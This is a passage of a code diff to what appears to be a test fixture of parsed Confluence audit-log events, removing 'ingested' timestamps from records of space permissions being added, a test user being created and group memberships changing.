added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":696000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1278,7 +1264,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:47:21.347850684Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"test.user\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"admin\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":54000000},\"version\":\"1.0\"}", "type": [ "user", @@ -1368,7 +1353,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347851381Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":147000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1457,7 +1441,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347852169Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":172000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1560,7 +1543,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347852874Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":401000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1656,7 +1638,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347853569Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":429000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1746,7 +1727,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347854260Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":437000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1842,7 +1822,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347855023Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":442000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1938,7 +1917,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347855730Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":445000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2028,7 +2006,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347856421Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":447000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2124,7 +2101,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347857217Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":450000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2220,7 +2196,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347857918Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":454000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2310,7 +2285,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347858688Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"COMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":457000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2406,7 +2380,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347859403Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":459000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2502,7 +2475,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347860107Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":462000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2592,7 +2564,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347874942Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":464000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2688,7 +2659,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347875698Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":467000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2784,7 +2754,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347876477Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":470000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2880,7 +2849,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347877211Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":472000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2970,7 +2938,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347877921Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":475000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3066,7 +3033,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347878636Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":479000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3162,7 +3128,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347879456Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":481000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3252,7 +3217,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347880173Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":484000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3348,7 +3312,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347880897Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":486000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3444,7 +3407,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347881608Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":489000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3534,7 +3496,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347882343Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":491000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3630,7 +3591,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347883057Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission 